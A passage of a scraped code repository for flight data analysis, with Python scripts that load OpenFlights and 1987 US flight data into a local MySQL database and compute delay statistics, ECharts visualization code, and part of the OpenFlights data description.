open(\"data\\\\\"+file_name+\".js\",'w',encoding=\"utf-8\")\r\n f.writelines(file_name +' = \\'[\\\\\\n')\r\n\r\n length = len(data[0])\r\n\r\n for ds in data:\r\n if ds[0].find('.') >= 0 and ds[0][0].isdigit():\r\n for i in range (length):\r\n ds[i] = np.float64(ds[i])\r\n elif ds[0].isdigit() or (ds[0].find('-') == 0 and ds[0][1:].isdigit()):\r\n con = False\r\n for i in range (length):\r\n if ds[i].find('.') >=0:\r\n con = True\r\n break\r\n if con == True:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 
'null'\r\n else:\r\n ds[i] = np.float64(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = int(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i].find(\"\\'\")>=0:\r\n index = ds[i].find('\\'')\r\n try:\r\n ds[i] = ''.join([ds[i][:index],'\\\\',ds[i][index:]])\r\n except:\r\n print([ds[i][:index],'\\\\',ds[i][index:]])\r\n exit(1)\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = ''.join(['\\\"', ds[i], '\\\"'])\r\n\r\n # print([data[i][0] for i in range(len(key))])\r\n for i in range (len(key)):\r\n key[i] = ''.join(['\\\"',key[i],'\\\"'])\r\n data_len = len(data[0])\r\n for i in range (data_len):\r\n dic = '{'\r\n for j in range(len(key)):\r\n dic = ' '.join([dic,''.join([key[j],':',str(data[j][i]),', '])])\r\n if dic[-2] == ',' and dic[-1] == ' ':\r\n dic = dic[:len(dic)-2]\r\n dic = ''.join([dic, '},\\\\\\n' if i < data_len-1 else '}\\\\\\n'])\r\n f.writelines(dic)\r\n f.writelines(']\\';')\r\n\r\n\r\ndatasets = []\r\ndatasets.append({'file_name':'airports',\r\n 'key':['Airport ID',\r\n 'Name',\r\n 'City',\r\n 'Country',\r\n 'IATA',\r\n 'ICAO',\r\n 'Latitude',\r\n 'Longitude',\r\n 'Altitude',\r\n 'Timezone',\r\n 'DST',\r\n 'Tz',\r\n 'Type',\r\n 'Source'],\r\n })\r\ndatasets.append({'file_name':'airlines',\r\n 'key':['Airline ID',\r\n 'Name',\r\n 'Alias',\r\n 'IATA',\r\n 'ICAO',\r\n 'Callsign',\r\n 'Country',\r\n 'Active'],\r\n })\r\ndatasets.append({'file_name':'routes',\r\n 'key':['Airline ID',\r\n 'Source airport',\r\n 'Source airport ID',\r\n 'Destination airport',\r\n 'Destination airport ID',\r\n 'Codeshare',\r\n 'Stops',\r\n 'Equipment'],\r\n })\r\ndatasets.append({'file_name':'planes',\r\n 'key':['IATA code',\r\n 'ICAO code'],\r\n })\r\n\r\n\r\n# format of datas = [[feature1], [feature2],...]\r\nfor dataset in datasets:\r\n datas = extract(dataset['file_name']+'.dat')\r\n\r\n # generate_CSV(datas, dataset['key'], dataset['file_name'])\r\n generate_fake_JSON(datas, dataset['key'], dataset['file_name'])"
},
{
"alpha_fraction": 0.470459520816803,
"alphanum_fraction": 0.5251641273498535,
"avg_line_length": 24.843137741088867,
"blob_id": "e60a96e1b276edd7496592e818f922cee1a08142",
"content_id": "a7a21a7654ddbbbc0b1832aadc672c64ca45bee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1371,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 51,
"path": "/fix_realtime_data.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pymysql as sql\r\n\r\n#time1 and time2 is int\r\ndef sub_time(time1, time2):\r\n if time2 == -1:\r\n return -1\r\n h1 = time1 // 100\r\n h2 = time2 // 100\r\n # just can be ude for the route : PEK to CAN \r\n if h2<5 and h1 > 20:\r\n h2 += 24\r\n if h1 < 5 and h2 > 20:\r\n h1 += 24\r\n m1 = time1 % 100\r\n m2 = time2 % 100\r\n m = m2 - m1\r\n h = h2 - h1\r\n if h > 0 and m < 0:\r\n m += 60\r\n h -= 1\r\n print(time1, time2)\r\n print('h='+str(h)+'\\tm='+str(m))\r\n return h*60+m\r\n\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\ncmd = \"USE flights_realtime\"\r\ncur.execute(cmd)\r\n\r\n# when writing this program, we have 591 rows in the sql\r\n# delay' unit is minute for easy comparision \r\nfor id in range (1, 592):\r\n cmd = \"SELECT aplan, areal FROM information WHERE ID = %d;\"%(id)\r\n cur.execute(cmd)\r\n row = cur.fetchone()\r\n delay = sub_time(int(row[0]), int(row[1]))\r\n\r\n cmd = \"UPDATE `flights_realtime`.`information` SET `delayTime`=%d WHERE `ID`=%d;\"%(delay, id)\r\n print(cmd)\r\n cur.execute(cmd)\r\n conn.commit()\r\n\r\n\r\n# the grammar of update data in mysql\r\n# UPDATE `flights_realtime`.`information` SET `delayTime`='-39' WHERE `ID`='1';\r\n\r\n"
},
{
"alpha_fraction": 0.293002188205719,
"alphanum_fraction": 0.31683167815208435,
"avg_line_length": 24.251100540161133,
"blob_id": "7818bf61dd83ca514048aae5bd1445259e3bcf63",
"content_id": "b849d7b76a2f7815b27f98f0c8fe42c981691e2e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6051,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 227,
"path": "/JavaScripts/airports_and_airlines.js",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "\r\nfunction showTimezone (data) {\r\n var myChart = echarts.init(document.getElementById('main2'));\r\n \r\n \r\n option = {\r\n title : {\r\n text: '各时区机场数量',\r\n },\r\n tooltip : {\r\n trigger: 'axis',\r\n axisPointer : { // 坐标轴指示器,坐标轴触发有效\r\n type : 'shadow' // 默认为直线,可选为:'line' | 'shadow'\r\n },\r\n formatter: function (params){\r\n return \"Timezone : \" + params[0].name + '<br/>'\r\n + params[0].seriesName + ' : ' + params[0].value + '<br/>'\r\n }\r\n },\r\n toolbox: {\r\n show : true,\r\n feature : {\r\n mark : {show: true},\r\n dataView : {show: true, readOnly: false},\r\n restore : {show: true},\r\n saveAsImage : {show: true}\r\n }\r\n },\r\n calculable : true,\r\n xAxis : [\r\n {\r\n type : 'category',\r\n data : ['-12','-11','-10','-9','-8','-7','-6','-5','-4','-3','-2','-1','0','1','2','3','4','5','6','7','8','9','10','11','12','13']\r\n }\r\n ],\r\n yAxis : [\r\n {\r\n type : 'value',\r\n boundaryGap: [0, 0.1]\r\n }\r\n ],\r\n series : [\r\n {\r\n name:'Number of Airports',\r\n type:'bar',\r\n stack: 'sum',\r\n barCategoryGap: '0%',\r\n itemStyle: {\r\n normal: {\r\n color: 'pink',\r\n label : {\r\n show: true, position: 'top'\r\n }\r\n }\r\n },\r\n data:data,\r\n },\r\n {\r\n name:'Number',\r\n type:'line',\r\n symbol: 'none',\r\n smooth: 0,\r\n color:['#66AEDE'],\r\n data:data,\r\n }\r\n ]\r\n };\r\n myChart.setOption(option)\r\n}\r\n\r\n\r\n\r\n\r\nfunction Longitude_Aatitude_Altitude (data, Acolor) {\r\n var myChart = echarts.init(document.getElementById('main1'));\r\n \r\n \r\n myChart.setOption({\r\n \r\n visualMap: {\r\n\r\n show: false,\r\n calculable: true,\r\n realtime: false,\r\n max: 3000,\r\n inRange: {\r\n color:['#a50026', '#d73027', '#f46d43', '#fdae61', '#fee090', '#ffffbf', '#e0f3f8', '#abd9e9', '#74add1', '#4575b4', '#313695']\r\n },\r\n outOfRange: {\r\n color: [\"#ddd\"]\r\n // colorAlpha: 0\r\n },\r\n\r\n // type: 'piecewise', \r\n // splitNumber:13, \r\n // max: 2000,\r\n // inRange: {\r\n // color: Acolor\r\n // },\r\n // outOfRange:{\r\n // color: [\"#ddd\"]\r\n // }\r\n },\r\n tooltip: {\r\n },\r\n xAxis3D: {\r\n name: \"经度\",\r\n type: 'value',\r\n },\r\n yAxis3D: {\r\n name: \"纬度\",\r\n type: 'value',\r\n },\r\n zAxis3D: {\r\n name: \"海拔\",\r\n type: 'value',\r\n },\r\n grid3D: {\r\n axisLine: {\r\n lineStyle: {\r\n color: '#000'\r\n }\r\n },\r\n axisPointer: {\r\n lineStyle: {\r\n color: '#f00'\r\n },\r\n show: false\r\n },\r\n viewControl: {\r\n// autoRotate: true,//旋转展示\r\n projection: 'orthographic',\r\n beta: 10\r\n },\r\n boxWidth: 300,\r\n boxHeight: 200,\r\n boxDepth: 200,\r\n top: -100\r\n },\r\n toolbox: {\r\n show : true,\r\n feature : {\r\n mark : {show: true},\r\n dataView : {show: true, readOnly: false},\r\n restore : {show: true},\r\n saveAsImage : {show: true}\r\n }\r\n },\r\n\r\n series: [\r\n {\r\n name:'scatter',\r\n type: 'scatter3D',\r\n dimensions: ['Longtitude', 'Latitude', 'Altitude'//显示框信息\r\n ],\r\n data: data,\r\n symbolSize: 3.2,\r\n symbol: 'triangle',\r\n itemStyle: {\r\n borderWidth: 1,\r\n borderColor: 'rgba(255,255,255,0.8)'\r\n },\r\n emphasis: {\r\n itemStyle: {\r\n color: '#ccc'\r\n }\r\n },\r\n itemStyle: {\r\n color: '#b0f'\r\n }\r\n }\r\n ],\r\n backgroundColor: \"#fff\"\r\n });\r\n}\r\n\r\n\r\n// ============================================================\r\n\r\n\r\nfunction Airline_Country_Active(data){\r\n var myChart = echarts.init(document.getElementById('main3'));\r\n \r\n\r\n myChart.setOption({\r\n backgroundColor: \"#ffffff\",\r\n color: [\"#FF9F7F\", \"#37A2DA\"],\r\n legend: {\r\n data: 
['non-Active', 'Active']\r\n },\r\n grid: {\r\n containLabel: true\r\n },\r\n xAxis: [{\r\n type: 'value'\r\n }],\r\n yAxis: [{\r\n type: 'category',\r\n axisTick: {\r\n show: false\r\n },\r\n data: data[0]\r\n }],\r\n series: [{\r\n name: 'Active',\r\n type: 'bar',\r\n stack: 'total',\r\n label: {\r\n normal: {\r\n show: true,\r\n position: 'right'\r\n }\r\n },\r\n data: data[1]\r\n }, {\r\n name: 'non-Active',\r\n type: 'bar',\r\n stack: 'total',\r\n label: {\r\n normal: {\r\n show: true,\r\n position: 'left'\r\n }\r\n },\r\n data: data[2]\r\n }]\r\n })\r\n}"
},
{
"alpha_fraction": 0.4255101978778839,
"alphanum_fraction": 0.45306122303009033,
"avg_line_length": 22.19753074645996,
"blob_id": "c245f304ca6ffec16de2be6132f53d657a3702bf",
"content_id": "ac306842beec614ff810d30acc30e82bde895bc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3932,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 162,
"path": "/1987toSQL.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport pymysql as sql\r\nimport numpy as np\r\n\r\n\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\ncmd = \"USE 1987csv\"\r\ncur.execute(cmd)\r\n\r\ntry:\r\n cmd = \"DROP TABLE flights\"\r\n cur.execute(cmd)\r\nexcept:\r\n pass\r\n\r\ncmd = (\r\n 'CREATE TABLE flights('\r\n '`Year` INT,'\r\n '`Month` INT,'\r\n '`DayofMonth` INT,'\r\n '`DayOfWeek` INT,'\r\n '`DepTime` VARCHAR(4),'\r\n '`CRSDepTime` VARCHAR(4),'\r\n '`ArrTime` VARCHAR(4),'\r\n '`CRSArrTime` VARCHAR(4),'\r\n '`UniqueCarrier` VARCHAR(8),'\r\n '`FlightNum` INT,'\r\n '`TailNum` VARCHAR(10),'\r\n '`ActualElapsedTime` FLOAT,'\r\n '`CRSElapsedTime` FLOAT,'\r\n '`AirTime` FLOAT,'\r\n '`ArrDelay` FLOAT,'\r\n '`DepDelay` FLOAT,'\r\n '`Origin` VARCHAR(3),'\r\n '`Dest` VARCHAR(3),'\r\n '`Distance` FLOAT,'\r\n '`TaxiIn` FLOAT,'\r\n '`TaxiOut` FLOAT,'\r\n '`Cancelled` INT,'\r\n '`CancellationCode` VARCHAR(1),'\r\n '`Diverted` FLOAT,'\r\n '`CarrierDelay` FLOAT,'\r\n '`WeatherDelay` FLOAT,'\r\n '`NASDelay` FLOAT,'\r\n '`SecurityDelay` FLOAT,'\r\n '`LateAircraftDelay` FLOAT'\r\n ')')\r\ncur.execute(cmd)\r\n\r\ndata = pd.read_csv(r'data\\1987.csv', dtype={\r\n 'Year': int,\r\n 'Month': int,\r\n 'DayofMonth': int,\r\n 'DayOfWeek': int,\r\n 'DepTime': str,\r\n\r\n 'CRSDepTime': str,\r\n 'ArrTime': str,\r\n 'CRSArrTime': str,\r\n 'UniqueCarrier': str,\r\n 'FlightNum': int,\r\n\r\n 'TailNum': str,\r\n 'ActualElapsedTime': np.float64,\r\n 'CRSElapsedTime': np.float64,\r\n 'AirTime': np.float64,\r\n 'ArrDelay': np.float64,\r\n\r\n 'DepDelay': np.float64,\r\n 'Origin': str,\r\n 'Dest': str,\r\n 'Distance': np.float64,\r\n 'TaxiIn': np.float64,\r\n\r\n 'TaxiOut': np.float64,\r\n 'Cancelled': int,\r\n 'CancellationCode': str,\r\n 'Diverted': np.float64,\r\n 'CarrierDelay': np.float64,\r\n\r\n 'WeatherDelay': np.float64,\r\n 'NASDelay': np.float64,\r\n 'SecurityDelay': np.float64,\r\n 'LateAircraftDelay': np.float64,\r\n})\r\nreader = np.array(data.loc[:,:])\r\n\r\n\r\n# 逐行读逐行传\r\npre_head = (\r\n'INSERT INTO flights('\r\n 'Year, '\r\n 'Month, '\r\n 'DayofMonth, '\r\n 'DayOfWeek, '\r\n 'DepTime, '\r\n 'CRSDepTime, '\r\n 'ArrTime, '\r\n 'CRSArrTime, '\r\n 'UniqueCarrier, '\r\n 'FlightNum, '\r\n 'TailNum, '\r\n 'ActualElapsedTime, '\r\n 'CRSElapsedTime, '\r\n 'AirTime, '\r\n 'ArrDelay, '\r\n 'DepDelay, '\r\n 'Origin, '\r\n 'Dest, '\r\n 'Distance, '\r\n 'TaxiIn, '\r\n 'TaxiOut, '\r\n 'Cancelled, '\r\n 'CancellationCode, '\r\n 'Diverted, '\r\n 'CarrierDelay, '\r\n 'WeatherDelay, '\r\n 'NASDelay, '\r\n 'SecurityDelay, '\r\n 'LateAircraftDelay'\r\n ') VALUES ('\r\n)\r\n\r\nlength_Info = len(reader[0])\r\nstr_type = type('1')\r\nnan_type = type(np.float64('nan'))\r\ncnt=0\r\nprint(2)\r\ntry:\r\n for info in reader:\r\n for i in range(length_Info):\r\n try:\r\n if type(info[i])==str_type:\r\n info[i] = '\\''+info[i]+'\\''\r\n if np.isnan(info[i]):\r\n info[i] = 'NULL'\r\n except:\r\n pass\r\n cmd = pre_head+(\r\n '{0}, {1}, {2}, {3}, {4}, '\r\n '{5}, {6}, {7}, {8}, {9}, '\r\n '{10}, {11}, {12}, {13}, {14}, '\r\n '{15}, {16}, {17}, {18}, {19}, '\r\n '{20}, {21}, {22}, {23}, {24}, '\r\n '{25}, {26}, {27}, {28}'\r\n ')'\r\n ).format(*info)\r\n #print(cmd)\r\n cnt+=1\r\n print(cnt)\r\n cur.execute(cmd)\r\n cur.connection.commit()\r\nfinally:\r\n cur.close()\r\n conn.close()\r\n"
},
{
"alpha_fraction": 0.6253629922866821,
"alphanum_fraction": 0.6466602087020874,
"avg_line_length": 28.441177368164062,
"blob_id": "ca046caa0676cd3cf4084bf066a3d017c13a2af2",
"content_id": "bf8ebe22e83b525b4d049b177b1511f0392f41fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1033,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 34,
"path": "/getNationalAirport.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\nimport pandas as pd\r\n\r\n## url = \"http://www.zou114.com/sanzidaima/index2.asp?gj=%D6%D0%B9%FA\"\r\n## format is {'Airport','IATA'}\r\ndef getNationalAirport(url):\r\n html = urlopen(url)\r\n bs = BeautifulSoup(html, 'lxml')\r\n href_of_airport = bs.find(name = 'p', attrs={'class': 'more150'}).find_all('a')\r\n chinaAirports = []\r\n\r\n for a in href_of_airport:\r\n chinaAirports.append({'Airport':a.get_text() ,'IATA':str(a)[21:24]})\r\n return chinaAirports\r\n\r\n\r\ndef generate_csv(chinaAirports):\r\n #save as CSV\r\n Airports = []\r\n IATA = []\r\n\r\n for i in chinaAirports:\r\n Airports.append(i['Airport'])\r\n IATA.append(i['IATA'])\r\n\r\n dataframe = pd.DataFrame({'Airport':Airports, 'IATA':IATA})\r\n dataframe.to_csv(r'data\\chinaAirports.csv', index = False,sep=',')\r\n\r\n\r\nurl = \"http://www.zou114.com/sanzidaima/index2.asp?gj=%D6%D0%B9%FA\"\r\nchinaAirports = getNationalAirport(url)\r\nprint(len(chinaAirports))\r\ngenerate_csv(chinaAirports)"
},
{
"alpha_fraction": 0.5978647470474243,
"alphanum_fraction": 0.6014235019683838,
"avg_line_length": 29.27777862548828,
"blob_id": "dc39755502b726b3eabe8a6d117f0aa4f4b63730",
"content_id": "bdc7e3a1925bd9d534c9f57bf22eeddd0597367e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 36,
"path": "/csv_to_JSON.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import csv\r\nimport json\r\n\r\ndef csv_to_json(filename, fieldnames):\r\n csv_file = open('data\\\\'+filename+'.csv', 'r', encoding='utf-8')\r\n json_file = open('data\\\\'+filename+'.js', 'w', encoding='utf-8')\r\n\r\n reader = csv.DictReader(csv_file, fieldnames)\r\n json_file.write('var '+filename+' = [\\n')\r\n for row in reader:\r\n json_file.write('\\t')\r\n json.dump(row, json_file)\r\n json_file.write(',\\n')\r\n json_file.write('];')\r\n# 有点问题,就是最后一个元素后面会多一个comma, 需要手动去除...\r\n# 因为reader好像不能用index去做,所以没法判断是否到了最后\r\n\r\nairlines = [\r\n \"airlines\",\r\n ('Airline ID','Name','Alias','IATA','ICAO','Callsign','Country','Active')\r\n]\r\nairports = [\r\n \"airports\",\r\n ('Airport ID','Name','City','Country','IATA','ICAO','Latitude','Longitude','Altitude','Timezone','DST','Tz','Type','Source')\r\n]\r\nplanes = [\r\n \"planes\",\r\n ('IATA code','ICAO code')\r\n]\r\nroutes = [\r\n \"routes\",\r\n ('Airline ID','Source airport','Source airport ID','Destination airport','Destination airport ID','Codeshare','Stops','Equipment')\r\n]\r\n\r\nfor file in [airlines, airports, planes, routes]:\r\n csv_to_json(file[0], file[1])"
},
{
"alpha_fraction": 0.4300699234008789,
"alphanum_fraction": 0.4615384638309479,
"avg_line_length": 21.83333396911621,
"blob_id": "bbdefc213e9e095984ae30d2abd0e2c656744466",
"content_id": "9dbd84cadbc854876de549c57d7695a36ac2cdaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 12,
"path": "/analysis1987.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pymysql as sql\r\nimport numpy as np\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\n# 延误率与准点率\r\n# delay 超过20 min算\r\n"
},
{
"alpha_fraction": 0.5300255417823792,
"alphanum_fraction": 0.5606899261474609,
"avg_line_length": 30.178081512451172,
"blob_id": "b19945edf3cbc500e155ad4e0a6eea6745d0143d",
"content_id": "743acc9e58a113eb66ea3ea23a22fd7adef7d175",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4962,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 146,
"path": "/cal_realtimeData.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pymysql as sql\r\nimport json\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\ncmd = \"USE flights_realtime\"\r\ncur.execute(cmd)\r\n\r\ncnt = [0]*int((210+70)/20)\r\nindex = 0\r\nfor delayTime in range (-70, 210, 20):\r\n cmd = \"SELECT COUNT(*) FROM information WHERE delayTime > %d and delayTime <= %d\"%(delayTime, delayTime+20)\r\n cur.execute(cmd)\r\n cnt[index] = cur.fetchone()[0]\r\n index += 1\r\n\r\ntotal_raw = 0\r\ncmd = \"SELECT COUNT(*) FROM information\"\r\ncur.execute(cmd)\r\ntotal_raw = cur.fetchone()[0]\r\n\r\n\r\ncompanys = set()\r\ncmd = \"SELECT company FROM information\"\r\ncur.execute(cmd)\r\nraws = cur.fetchall()\r\nfor raw in raws:\r\n companys.add(raw[0])\r\n# len(company) = 10\r\n\r\ncompanys = [\r\n '中国国航', \r\n '南方航空',\r\n '夏威夷航空公司', \r\n '东方航空', \r\n '海南航空', \r\n '美国航空', \r\n '四川航空', \r\n '达美航空公司', \r\n '深圳航空', \r\n '厦门航空'\r\n ]\r\ncompany_delay = {key:0 for key in companys}\r\n\r\n# 延误情况 信息: company ,flight_number, cond, date, delayTime\r\n# 每天各公司的延误统计\r\nday_delay = {}\r\nfor day in range (20180823, 20180832):\r\n cnt_delay = {key:0 for key in companys}\r\n for company in companys:\r\n cmd = \"SELECT COUNT(*) FROM information where company = \\\"%s\\\" and cond > 0 and date = %d\"%(company, day)\r\n cur.execute(cmd)\r\n cnt_delay[company] = cur.fetchone()[0]\r\n company_delay[company] += cnt_delay[company] \r\n day_delay[str(day)] = cnt_delay\r\nfor day in range (20180901, 20180908):\r\n cnt_delay = {key:0 for key in companys}\r\n for company in companys:\r\n cmd = \"SELECT COUNT(*) FROM information where company = \\\"%s\\\" and cond > 0 and date = %d\"%(company, day)\r\n cur.execute(cmd)\r\n cnt_delay[company] = cur.fetchone()[0]\r\n company_delay[company] += cnt_delay[company] \r\n day_delay[str(day)] = cnt_delay\r\n\r\n\r\n# 出来的数据手动调一下comma就好\r\n# 需要的格式:\r\n# {date:[{name:str, value:int}, ..], .. 
}\r\n# 每天每个公司的延误情况\r\ndef generate_day_delay(day_delay):\r\n f = open(r\"data\\day_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var day_delay = \\'{\\\\\\n\")\r\n print(day_delay.keys())\r\n for day in day_delay.keys():\r\n tmp = \"\\\"%s\\\":[\"%(day)\r\n for comp in companys:\r\n tmp += '{\\\"name\\\":\\\"%s\\\", \\\"value\\\":%d},'%(comp, day_delay[day][comp])\r\n tmp += '],\\\\\\n'\r\n f.writelines(tmp)\r\n f.writelines(\"}\\';\")\r\n\r\n\r\ndef generate_company_delay(company_delay, companys):\r\n f = open(r\"data\\company_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var company_delay = [\")\r\n for comp in companys:\r\n f.writelines('%d, '%(company_delay[comp]))\r\n f.writelines(\"];\")\r\n\r\n# 可用于预测 \r\n\r\n\r\n\r\n# 昨天的出发和到达,双折线图/ 以延误区间为interval的时间轴\r\n# 什么时候出发的飞机最容易延误\r\nevery_day_delay = {}\r\ntimezone = [str(i) for i in range (0, 2400, 100)]\r\nall_day_delay = {key:0 for key in timezone}\r\n\r\n\r\nfor day in range (20180823, 20180832):\r\n cnt_delay = {key:0 for key in timezone}\r\n for dreal in range (0, 2400, 100):\r\n cmd = \"SELECT COUNT(*) FROM information where dreal >= %d and dreal < %d and cond > 0 and date = %d\"%(dreal, dreal+100, day)\r\n cur.execute(cmd)\r\n cnt_delay[str(dreal)] = cur.fetchone()[0]\r\n all_day_delay[str(dreal)] += cnt_delay[str(dreal)]\r\n every_day_delay[str(day)] = cnt_delay\r\n\r\nfor day in range (20180901, 20180908):\r\n cnt_delay = {key:0 for key in timezone}\r\n for dreal in range (0, 2400, 100):\r\n cmd = \"SELECT COUNT(*) FROM information where dreal >= %d and dreal < %d and cond > 0 and date = %d\"%(dreal, dreal+100, day)\r\n cur.execute(cmd)\r\n cnt_delay[str(dreal)] = cur.fetchone()[0]\r\n all_day_delay[str(dreal)] += cnt_delay[str(dreal)]\r\n every_day_delay[str(day)] = cnt_delay\r\n\r\ndef generate_every_day_delay(every_day_delay, timezone):\r\n f = open(r\"data\\every_day_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var every_day_delay = \\'{\\\\\\n\")\r\n print(every_day_delay.keys())\r\n for day in every_day_delay.keys():\r\n tmp = \"\\\"%s\\\":[\"%(day)\r\n for tz in timezone:\r\n tmp += '{\\\"name\\\":\\\"%s\\\", \\\"value\\\":%d},'%(tz, every_day_delay[day][tz])\r\n tmp += '],\\\\\\n'\r\n f.writelines(tmp)\r\n f.writelines(\"}\\';\")\r\n\r\n\r\n\r\ndef generate_all_day_delay(all_day_delay, timezone):\r\n f = open(r\"data\\all_day_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var all_day_delay = [\")\r\n for tz in timezone:\r\n f.writelines('%d, '%(all_day_delay[tz]))\r\n f.writelines(\"];\")\r\n \r\nprint(timezone)\r\ngenerate_all_day_delay(all_day_delay, timezone)"
},
{
"alpha_fraction": 0.6817119121551514,
"alphanum_fraction": 0.7041734457015991,
"avg_line_length": 80.58381652832031,
"blob_id": "14f9d3f4001a9cb227d0f5fc918bbce25179123b",
"content_id": "20bff89b221135a6d974796111290d64313e5aff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14113,
"license_type": "no_license",
"max_line_length": 623,
"num_lines": 173,
"path": "/data/aboutTheData.md",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "# Airport, airline and route data\n\n## Airport database\n\n[](https://openflights.org/demo/openflights-apdb-2048.png)\n(click to enlarge)\n\nAs of January 2017, the OpenFlights Airports Database contains **over 10,000** airports, train stations and ferry terminals spanning the globe, as shown in the map above. Each entry contains the following information:\n\n| | |\n| --------------------- | ------------------------------------------------------------ |\n| Airport ID | Unique OpenFlights identifier for this airport. |\n| Name | Name of airport. May or may not contain the **City** name. |\n| City | Main city served by airport. May be spelled differently from **Name**. |\n| Country | Country or territory where airport is located. See [countries.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/countries.dat) to cross-reference to ISO 3166-1 codes. |\n| IATA | 3-letter IATA code. Null if not assigned/unknown. |\n| ICAO | 4-letter ICAO code. Null if not assigned. |\n| Latitude | Decimal degrees, usually to six significant digits. Negative is South, positive is North. |\n| Longitude | Decimal degrees, usually to six significant digits. Negative is West, positive is East. |\n| Altitude | In feet. |\n| Timezone | Hours offset from UTC. Fractional hours are expressed as decimals, eg. India is 5.5. |\n| DST | Daylight savings time. One of E (Europe), A (US/Canada), S (South America), O (Australia), Z (New Zealand), N (None) or U (Unknown). *See also: Help: Time* |\n| Tz database time zone | Timezone in [\"tz\" (Olson) format](http://en.wikipedia.org/wiki/Tz_database), eg. \"America/Los_Angeles\". |\n| Type | Type of the airport. Value \"airport\" for air terminals, \"station\" for train stations, \"port\" for ferry terminals and \"unknown\" if not known. *In airports.csv, only type=airport is included.* |\n| Source | Source of this data. \"OurAirports\" for data sourced from [OurAirports](http://ourairports.com/data/), \"Legacy\" for old data not matched to OurAirports (mostly DAFIF), \"User\" for unverified user contributions. *In airports.csv, only source=OurAirports is included.* |\n\nThe data is UTF-8 (Unicode) encoded.\n\n*Note*: Rules for daylight savings time change from year to year and from country to country. The current data is an approximation for 2009, built on a country level. Most airports in DST-less regions in countries that generally observe DST (eg. AL, HI in the USA, NT, QL in Australia, parts of Canada) are marked incorrectly.\n\n#### Sample entries\n\n```\n507,\"London Heathrow Airport\",\"London\",\"United Kingdom\",\"LHR\",\"EGLL\",51.4706,-0.461941,83,0,\"E\",\"Europe/London\",\"airport\",\"OurAirports\"\n26,\"Kugaaruk Airport\",\"Pelly Bay\",\"Canada\",\"YBB\",\"CYBB\",68.534401,-89.808098,56,-7,\"A\",\"America/Edmonton\",\"airport\",\"OurAirports\"\n3127,\"Pokhara Airport\",\"Pokhara\",\"Nepal\",\"PKR\",\"VNPK\",28.200899124145508,83.98210144042969,2712,5.75,\"N\",\"Asia/Katmandu\",\"airport\",\"OurAirports\"\n8810,\"Hamburg Hbf\",\"Hamburg\",\"Germany\",\"ZMB\",\\N,53.552776,10.006683,30,1,\"E\",\"Europe/Berlin\",\"station\",\"User\"\n```\n\nTry it out: [Airport Search](https://openflights.org/html/apsearch) (new window)\n\n*Note*: The Airport Search window above is a part of [OpenFlights](http://openflights.org/). 
You will not be able to add or edit airports unless you are logged in.\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights) as a very straightforward CSV (comma-separated value) file, suitable for use in spreadsheets etc, simply click below:\n\nDownload: [airports.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/airports.dat) (Airports only, high quality)\n\nDownload: [airports-extended.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/airports-extended.dat) (Airports, train stations and ferry terminals, including user contributions)\n\nCreating and maintaining this database has required and continues to require an *immense amount* of work, which is why it would cost you *over one thousand dollars* to buy it from a commercial supplier. We need your support to keep this database up-to-date: just 